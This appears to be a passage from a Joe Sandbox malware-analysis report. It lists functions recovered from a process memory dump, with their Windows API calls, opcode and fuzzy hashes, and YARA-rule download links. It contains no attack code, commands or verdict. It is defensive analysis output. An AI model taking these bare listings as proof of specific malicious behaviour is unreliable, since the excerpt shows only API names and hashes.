                                                                                                                                • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                • API String ID: 1029625771-192647395
                                                                                                                                • Opcode ID: fa5645a4f4b90cb37285a0c2e1e2d27224286b5e80f7b15e67e2848a9781bcaa
                                                                                                                                • Instruction ID: 9e1cf09f37751c9495c7b48ceb8f697c82646ef1ca6377066c9be0124b3b2a8a
                                                                                                                                • Opcode Fuzzy Hash: fa5645a4f4b90cb37285a0c2e1e2d27224286b5e80f7b15e67e2848a9781bcaa
                                                                                                                                • Instruction Fuzzy Hash: 98D0A7358503238FE7205F31F90DB423AD4EB24719B20641EE545E2160D770C4C0A614
                                                                                                                                Function 00F6EBB9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00F6EBAF,?,00F6EAAC), ref: 00F6EBC7
                                                                                                                                • 6C3C6DE0.KERNEL32(00000000,GetSystemWow64DirectoryW,?,00F6EBAF,?,00F6EAAC), ref: 00F6EBD9
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: LibraryLoad
                                                                                                                                • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                                • API String ID: 1029625771-1816364905
                                                                                                                                • Opcode ID: 9862a282d1a3d6b6c140799137fdaf6b6c63a1f4052257e10808a911151e63a7
                                                                                                                                • Instruction ID: db2ac1a6201f329c62ec94983200f4d21e88c12b36fd2f01e7dd341a737d443b
                                                                                                                                • Opcode Fuzzy Hash: 9862a282d1a3d6b6c140799137fdaf6b6c63a1f4052257e10808a911151e63a7
                                                                                                                                • Instruction Fuzzy Hash: A0D0A73A8043138FE7205F30F949F4136D4AB0431CB30841EF996D3150DB70D8C0A610
                                                                                                                                Function 00F513A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00F51371,?,00F51519), ref: 00F513B4
                                                                                                                                • 6C3C6DE0.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00F513C6
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: LibraryLoad
                                                                                                                                • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                                                                • API String ID: 1029625771-1587604923
                                                                                                                                • Opcode ID: ba6809df5255c5f027563da6174dfd07305ec4a196b4ce0314684deda970477d
                                                                                                                                • Instruction ID: 8182ccdb1d73761994d6bf4afef734c6a1ff604adb28dce01345023cd4b09a92
                                                                                                                                • Opcode Fuzzy Hash: ba6809df5255c5f027563da6174dfd07305ec4a196b4ce0314684deda970477d
                                                                                                                                • Instruction Fuzzy Hash: DDD0A7319003179FE7200F24F909B0136E8BF4031DF10441EEA95D2560DAB4D4C4E710
                                                                                                                                Function 00F5137B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • LoadLibraryA.KERNEL32(oleaut32.dll,?,00F5135F,?,00F51440), ref: 00F51389
                                                                                                                                • 6C3C6DE0.KERNEL32(00000000,RegisterTypeLibForUser,?,00F51440), ref: 00F5139B
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: LibraryLoad
                                                                                                                                • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                                                                • API String ID: 1029625771-1071820185
                                                                                                                                • Opcode ID: a52bfe9b4b07914e8db81e53ef9a8dee830476fb1b179094b7c34a1e44e63645
                                                                                                                                • Instruction ID: 3de12cb5522277847e167156b647c87324afcc2fd25eaf84c01faeb38c36c86d
                                                                                                                                • Opcode Fuzzy Hash: a52bfe9b4b07914e8db81e53ef9a8dee830476fb1b179094b7c34a1e44e63645
                                                                                                                                • Instruction Fuzzy Hash: 01D0A732C403139FE7200F24F909B8136D4BF0431DF14841EEA85D2550D670D8C4B710
                                                                                                                                Function 00F73ACC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,00F73AC2,?,00F73CF7), ref: 00F73ADA
                                                                                                                                • 6C3C6DE0.KERNEL32(00000000,RegDeleteKeyExW), ref: 00F73AEC
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: LibraryLoad
                                                                                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                • API String ID: 1029625771-4033151799
                                                                                                                                • Opcode ID: a93c8420273c5ae90132159341e40f629683060d6fd0fe9eb3cd9df29458abc5
                                                                                                                                • Instruction ID: 97f2a69552c2b2e681e5a5e7204ce3a219fde4db0535a53fc22cfb40447cc791
                                                                                                                                • Opcode Fuzzy Hash: a93c8420273c5ae90132159341e40f629683060d6fd0fe9eb3cd9df29458abc5
                                                                                                                                • Instruction Fuzzy Hash: 44D05E758003179EFB204B20A90AB4176D4AB11318B10841EE599D2150EAB4D580B615
                                                                                                                                Function 00F1AA70 Relevance: 6.3, APIs: 4, Instructions: 300COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,00F66AA6), ref: 00F1AB2D
                                                                                                                                • _wcscmp.LIBCMT ref: 00F1AB49
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: BuffCharUpper_wcscmp
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 820872866-0
                                                                                                                                • Opcode ID: c3ec539aec72f633ad3d138e4d342c79a767145943925470ec597e5e64f0b1a0
                                                                                                                                • Instruction ID: 847c10bdc977cfbf93db47f5be2a837d111dde14a206ab764028217f92f86ac5
                                                                                                                                • Opcode Fuzzy Hash: c3ec539aec72f633ad3d138e4d342c79a767145943925470ec597e5e64f0b1a0
                                                                                                                                • Instruction Fuzzy Hash: 3BA10271B0110ADBDB15EF24E9916EDB7B1FF44310F64416AEC1683290EB35D8B0EB82
                                                                                                                                Function 00F70D01 Relevance: 6.3, APIs: 4, Instructions: 300memoryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • CharLowerBuffW.USER32(?,?), ref: 00F70D85
                                                                                                                                • CharLowerBuffW.USER32(?,?), ref: 00F70DC8
                                                                                                                                  • Part of subcall function 00F70458: CharLowerBuffW.USER32(?,?,?,?), ref: 00F70478
                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00F70FB2
                                                                                                                                • _memmove.LIBCMT ref: 00F70FC2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3659485706-0
                                                                                                                                • Opcode ID: f6ecbdc1056150002ab6380b4d927ca910d1431bfb8b63faf8d3ad4588c7a387
                                                                                                                                • Instruction ID: 665058187c0f057bdc66e02e8e95f0101a0e17378849aa81ad6086e2dca167b3
                                                                                                                                • Opcode Fuzzy Hash: f6ecbdc1056150002ab6380b4d927ca910d1431bfb8b63faf8d3ad4588c7a387
                                                                                                                                • Instruction Fuzzy Hash: ADB15B71A04300DFC714DF28C88196ABBE4EF89714F14896EF8899B352DB35ED46DB92
                                                                                                                                Function 00F6AF26 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • CoInitialize.OLE32(00000000), ref: 00F6AF56
                                                                                                                                • CoUninitialize.COMBASE ref: 00F6AF61
                                                                                                                                  • Part of subcall function 00F51050: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 00F510B8
                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00F6AF6C
                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00F6B23F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 780911581-0
                                                                                                                                • Opcode ID: 086d0e5a191ea40c3f0b25bb58a3ff6fda1ab1446e517ecd7dc7793075521a29
                                                                                                                                • Instruction ID: 3112467d56bc7b29ed63ef5a01de993fb18138c157740dd00cfb2e59e41e39e6
                                                                                                                                • Opcode Fuzzy Hash: 086d0e5a191ea40c3f0b25bb58a3ff6fda1ab1446e517ecd7dc7793075521a29
                                                                                                                                • Instruction Fuzzy Hash: 44A18C35604701AFCB10DF14C991B5AB7E4FF89360F148449F99AAB3A1CB34ED85EB82
                                                                                                                                Function 00F1C320 Relevance: 6.3, APIs: 4, Instructions: 259fileCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • _memmove.LIBCMT ref: 00F1C419
                                                                                                                                • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,00F56653,?,?,00000000), ref: 00F1C495
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileRead_memmove
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1325644223-0
                                                                                                                                • Opcode ID: 12932ed5874b0ea9e8e8ee2c9d554242d1b6826790ba8a5bb3b6e930b2f68d63
                                                                                                                                • Instruction ID: cf1df1267072905e546ed5a4534dcfd81976ea18880636bc83a5328debdd6093
                                                                                                                                • Opcode Fuzzy Hash: 12932ed5874b0ea9e8e8ee2c9d554242d1b6826790ba8a5bb3b6e930b2f68d63
                                                                                                                                • Instruction Fuzzy Hash: BDA1ED31A08219EBDB00DF65C885BEDFBB0FF05310F24C199E8659B285D735E9A1EB91
                                                                                                                                Function 00F342EB Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3877424927-0
                                                                                                                                • Opcode ID: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
                                                                                                                                • Instruction ID: 1cb76de5168054f9336055526e491f96c7d0bb29e05eb5f27a1f291120df5254
                                                                                                                                • Opcode Fuzzy Hash: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
                                                                                                                                • Instruction Fuzzy Hash: 62518D31E00206DBDB24DEA9C8807AEBBA5AF40370F248729F865972D0D774BD55BB40
                                                                                                                                Function 00F7C2E7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00F7C354
                                                                                                                                • ScreenToClient.USER32(?,00000002), ref: 00F7C384
                                                                                                                                • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 00F7C3EA
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$ClientMoveRectScreen
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3880355969-0
                                                                                                                                • Opcode ID: 8a693ad9ad6f0ab60483a5eec80e6449f3c89f3a908db2397fd49db07b31ab6a
                                                                                                                                • Instruction ID: 19e0e5dd8523bcae89c17a6c498b1a18977ecc9c1ebb42d65c637a293bd2d570
                                                                                                                                • Opcode Fuzzy Hash: 8a693ad9ad6f0ab60483a5eec80e6449f3c89f3a908db2397fd49db07b31ab6a
                                                                                                                                • Instruction Fuzzy Hash: 77513E71900209EFCF20DF68D880AAE7BB6BB45360F24C55AF9299B291D770DD41EB91
                                                                                                                                Function 00F4D206 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00F4D258
                                                                                                                                • __itow.LIBCMT ref: 00F4D292
                                                                                                                                  • Part of subcall function 00F4D4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00F4D549
                                                                                                                                • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00F4D2FB
                                                                                                                                • __itow.LIBCMT ref: 00F4D350
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$__itow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3379773720-0
                                                                                                                                • Opcode ID: 2ea8d70a290dc685bcb82e0257d5722b5cbab1b7151660122414ac419c4bb3a9
                                                                                                                                • Instruction ID: 0cad1f8556bd188040d2d5f3dd6e0e0681b6c12ff4c86500b44d2733bc70ee6f
                                                                                                                                • Opcode Fuzzy Hash: 2ea8d70a290dc685bcb82e0257d5722b5cbab1b7151660122414ac419c4bb3a9
                                                                                                                                • Instruction Fuzzy Hash: 46419771A00309ABDF15EF54CC42FEE7FB99F44710F000069FA05A7191DBB59A85EB92
                                                                                                                                Function 00F7B354 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F7B3E1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InvalidateRect
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 634782764-0
                                                                                                                                • Opcode ID: 915da786192c02983eb403200a602fe03a530887fd46a903caa183565b5cb832
                                                                                                                                • Instruction ID: 9a06391c0d20f77e6321fcc4fbe164f6173f91ef37cff0751f4db836769b97b3
                                                                                                                                • Opcode Fuzzy Hash: 915da786192c02983eb403200a602fe03a530887fd46a903caa183565b5cb832
                                                                                                                                • Instruction Fuzzy Hash: 5A317E35A00208BBEF24DF589C89BA83765AB0B360F64C513FA59D61A2C731D990BB52
                                                                                                                                Function 00F7D5EE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • ClientToScreen.USER32(?,?), ref: 00F7D617
                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00F7D68D
                                                                                                                                • PtInRect.USER32(?,?,00F7EB2C), ref: 00F7D69D
                                                                                                                                • MessageBeep.USER32(00000000), ref: 00F7D70E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1352109105-0
                                                                                                                                • Opcode ID: c6c62b3e886608abff32b41b6d438854483dc08efd897db87cb7cca268d02e9f
                                                                                                                                • Instruction ID: 94c6d4a9e16a5d5611e374dc02fd215133949c56d0a9a1de6108f91eb403a1f9
                                                                                                                                • Opcode Fuzzy Hash: c6c62b3e886608abff32b41b6d438854483dc08efd897db87cb7cca268d02e9f
                                                                                                                                • Instruction Fuzzy Hash: 71416C31A00118EFCB15CF68D884BA97BF5BF49310F6881ABE40DDB251D730E841EB52
                                                                                                                                Function 00F54497 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                                                                                                                                Download Yara Rule
